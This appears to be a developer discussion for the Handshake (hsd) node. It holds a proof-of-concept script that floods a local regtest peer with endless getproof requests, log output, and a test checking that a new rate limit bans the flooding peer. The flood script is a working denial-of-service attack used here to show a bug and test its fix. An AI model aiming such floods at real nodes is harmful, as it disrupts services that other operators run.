getproof-dos.js

'use strict';

const FullNode = require('./lib/node/fullnode');
const NetAddress = require('./lib/net/netaddress.js');
const Network = require('./lib/protocol/network.js');
const random = require('bcrypto/lib/random');
const Logger = require('blgr');
const bs32 = require('bs32');
const rules = require('./lib/covenants/rules');

const key = bs32.decode('aorsxa4ylaacshipyjkfbvzfkh3jhh4yowtoqdt64nzemqtiw2whk');

async function sleep(time) {
  return new Promise(resolve => setTimeout(resolve, time));
}

(async () => {
  const node = new FullNode({
    'logger': new Logger({
      console: true,
      level: 'debug'
    }),
    'network': 'regtest',
    'http-port': 15037,
    'ns-port': 26349,
    'rs-port': 26330,
    'port': 15038
  });

  await node.open();

  const peer = await node.pool.createOutbound(new NetAddress({
    'host': '127.0.0.1',
    'port': 14038,
    'key': key
  }));

  await sleep(2000);

  const root = await node.chain.getSafeRoot();
  const hash = rules.hashString('google');

  // peer.nameMap.set(hash, Date.now());
  // TODO: this should prevent remote from getting banned but throws instead...
  // just comment out peer.increaseBan() handleProof for now.
  
  for (let i=0; ;i++) {
    console.log('%d: sending getproof', i);
    peer.sendGetProof(root, hash);
  }
})();

master: [warning] (peer) Peer is not reading: 10.000021934509277mb buffered (127.0.0.1:50342).

getproof-sliding-window: (peer) proof: rate limit exceeded (127.0.0.1:50742).

describe('SlidingWindow (Functional)', function() {
  it('should connect and ban', async () => {
    const one = new FullNode({
      memory: true,
      network: 'regtest',
      'max-proof-rps': 5,
      listen: true,
      host: '127.0.1.1',
      'http-host': '127.0.1.1',
      'rs-host': '127.0.1.1',
      'ns-host': '127.0.1.1',
      seeds: []
    });

    //assert.equal(one.pool.options.proofRPS, 20);

    const key = base32.encode(one.pool.hosts.address.key);

    const two = new FullNode({
      memory: true,
      network: 'regtest',
      host: '127.0.0.2',
      'http-host': '127.0.0.2',
      'rs-host': '127.0.0.2',
      'ns-host': '127.0.0.2',
      seeds: [],
      only: [`${key}@127.0.1.1`]
    });

    await one.open();
    await one.connect();

    await two.open();
    await two.connect();

    await common.event(one.pool, 'peer open');

    assert.equal(one.pool.peers.size(), 1);
    assert.equal(one.pool.peers.inbound, 1);
    assert.equal(two.pool.peers.size(), 1);
    assert.equal(two.pool.peers.outbound, 1);

    const root = await one.chain.getSafeRoot();
    const hash = rules.hashString('google');

    let seen = false;
    two.pool.on('ban', (peer) => {
      seen = true;
    });

    const peer = two.pool.peers.head();

    let packets = 0;
    one.pool.on('packet', (packet) => {
      if (packet.type === 26)
        packets++;
    });

    let count = 0;
    while (!seen) {
      await peer.sendGetProof(root, hash);
      // Wait until the response was sent back.
      // trying with both one and two here
      await common.event(one.pool, 'packet');
      //await sleep(1000);
      count++;
    }

    console.log(`Sent: ${count}, Seen: ${packets}`);
    assert(two.pool.hosts.banned.has('127.0.1.1'));

    await one.close();
    await two.close();
  });
});

awesome, I'm stealing this 👍